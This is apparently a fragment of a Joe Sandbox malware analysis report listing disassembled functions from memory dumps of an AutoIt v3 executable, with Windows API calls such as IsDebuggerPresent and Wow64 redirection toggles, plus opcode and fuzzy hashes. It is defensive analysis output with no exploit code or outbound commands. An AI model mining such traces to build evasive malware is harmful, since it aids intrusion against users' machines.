                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ebcb9fea7ce739741143ef1ea187afa24ac43c47a3d95d33c65e4a5b861c0ac
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92C1CD71A04249EFCF119FA9D841BEDBBB0AF09315F046999E914BB393C730994ACB61

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 1777 e235b3-e23623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E235E1
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E23602
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E23368,?), ref: 00E23616
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E23368,?), ref: 00E2361F
                                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                    • Opcode ID: a313a7737c91cae009867274c992f6f553cb96386fe760068d906de6bcc07668
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac4e6ac615ee12aced3d1ccdcbe88ccebf22df19778b3d6e57ae1ecfe354c346
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a313a7737c91cae009867274c992f6f553cb96386fe760068d906de6bcc07668
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF05EB16062967EE7310B236C09EBB3EBDD7C7F10F00002EBA04B7160D7A90849DAB0

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E65287
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E26299
                                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Line %d: $AutoIt - $\+
                                                                                                                                                                                                                                                                                                    • API String ID: 2289894680-1638154863
                                                                                                                                                                                                                                                                                                    • Opcode ID: e1cf260d00a2ca4dfa06656a10570e68dba4928ca20514c151915c0af728ca28
                                                                                                                                                                                                                                                                                                    • Instruction ID: 45118cdc402999b9870cfc8b7127a66e9288f1bd5d42b43b961ce3d75b2bdb25
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1cf260d00a2ca4dfa06656a10570e68dba4928ca20514c151915c0af728ca28
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D841A472408325AED311EB60FC45EEF7BECAF84310F00562EF599B20A1EB349649C792

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 1829 e2663e-e26654 LoadLibraryA 1830 e26656-e26664 GetProcAddress 1829->1830 1831 e26674-e26678 1829->1831 1832 e26666 1830->1832 1833 e26669-e2666b 1830->1833 1832->1833 1833->1831 1834 e2666d-e2666e FreeLibrary 1833->1834 1834->1831
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E2668B,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E2664A
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E2665C
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00E2668B,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E2666E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,OV,00E5894C,?,00EE9CE8,0000000C,00E589AB,?,OV,?,00E6564F), ref: 00E58A84
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E58A8E
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E58AB9
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID: OV
                                                                                                                                                                                                                                                                                                    • API String ID: 2583163307-2262073888
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E258BE,SwapMouseButtons,00000004,?), ref: 00E258EF
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E258BE,SwapMouseButtons,00000004,?), ref: 00E25910
                                                                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E258BE,SwapMouseButtons,00000004,?), ref: 00E25932
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E33006
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: CALL$bn
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-1920074456
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00E6413B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E255D1,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E25871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E23A76
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                    • String ID: X$`u
                                                                                                                                                                                                                                                                                                    • API String ID: 779396738-2693526198
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c4dde9d6e085f6e7536186fb3fec5c4de79eb3a7eba3dd79b821098004cfd4b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8a317a1490e64c1556b585ffd27e73d5600ff31e1ef3d89feb424bf211fe94cc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c4dde9d6e085f6e7536186fb3fec5c4de79eb3a7eba3dd79b821098004cfd4b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B219671A0426C9BCB01DF94E805BEE7BFCAF45304F009059E545B7281DBF89A8D8F61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00E409D8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E43614: RaiseException.KERNEL32(?,?,?,00E409FA,?,00000000,?,?,?,?,?,?,00E409FA,00000000,00EE9758,00000000), ref: 00E43674
                                                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00E409F5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                    • Opcode ID: bd4964f7d3fc7cd53f5c1fd890f23175d6e7aa675a0ea1de069587edf2e47426
                                                                                                                                                                                                                                                                                                    • Instruction ID: ed61f2010188276d44d4034819b7968476709e71a3f7ae09c7eb076e852b6cb1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd4964f7d3fc7cd53f5c1fd890f23175d6e7aa675a0ea1de069587edf2e47426
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3F04F3490020DB7CB00BEA9F84699A77AC5E80354B606175BB14B66A3EB71EA5A8690
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00EA8D52
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00EA8D59
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00EA8F3A
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a39f8255313e1325082b7cc3356ada6c919e2d822c317534747146fa702dbaaf
                                                                                                                                                                                                                                                                                                    • Instruction ID: a0ac839db3997671c21fa5c79724b4acbbec2ebb749bb6b476b0c1aa481a7e69
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a39f8255313e1325082b7cc3356ada6c919e2d822c317534747146fa702dbaaf
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74127B71A083019FC724DF28C584B5ABBE5BF89318F04995DE889AB352DB30E945CF92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E261A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E26299
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00E3FD36
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E3FD45
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E7FE33
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 88b9713cd161d4e4b1a8ecc40f6007c50fde45845d254d249901ddaf9a88fe25
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9aa85ee81936180a859fed35d9f281126aaaae692802edf8df70f101abaff615
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88b9713cd161d4e4b1a8ecc40f6007c50fde45845d254d249901ddaf9a88fe25
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3031C571904354AFEB32CF248859BE7BBECAB02308F0054AED6DD77242D7745A85CB51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00E597BA,FF8BC369,00000000,00000002,00000000), ref: 00E59744
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00E597BA,FF8BC369,00000000,00000002,00000000,?,00E55ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00E46F41), ref: 00E5974E
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E59755
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2336955059-0
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E23A3C
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
APIs
• IsThemeActive.UXTHEME ref: 00E2333D
  • Part of subcall function 00E232E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E232FB
  • Part of subcall function 00E232E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E23312
  • Part of subcall function 00E2338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E23368,?), ref: 00E233BB
  • Part of subcall function 00E2338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E23368,?), ref: 00E233CE
  • Part of subcall function 00E2338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EF2418,00EF2400,?,?,?,?,?,?,00E23368,?), ref: 00E2343A
  • Part of subcall function 00E2338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00EF2418,?,?,?,?,?,?,?,00E23368,?), ref: 00E234BB
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00E23377
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
• String ID:
• API String ID: 1550534281-0
Similarity
• API ID: CloseHandleSleep
• String ID:
• API String ID: 252777609-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E2CEEE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00E8FCCE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E2668B,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E2664A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E2665C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2663E: FreeLibrary.KERNEL32(00000000,?,?,00E2668B,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E2666E
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E266AB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E26607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E65657,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E26610
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E26607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E26622
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E26607: FreeLibrary.KERNEL32(00000000,?,?,00E65657,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E26635
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E54FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00E5319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00E55031
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E553DF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00E9F987
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2664df668bf7db0b5e162bb41ecad2ab27bce4c06a77c493bd4cb599a9a3c44f
                                                                                                                                                                                                                                                                                                    • Instruction ID: d911ca9f75ccab912641450fd09aa66d06eff30d0ac14f8e28511ca4ccc5945d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2664df668bf7db0b5e162bb41ecad2ab27bce4c06a77c493bd4cb599a9a3c44f
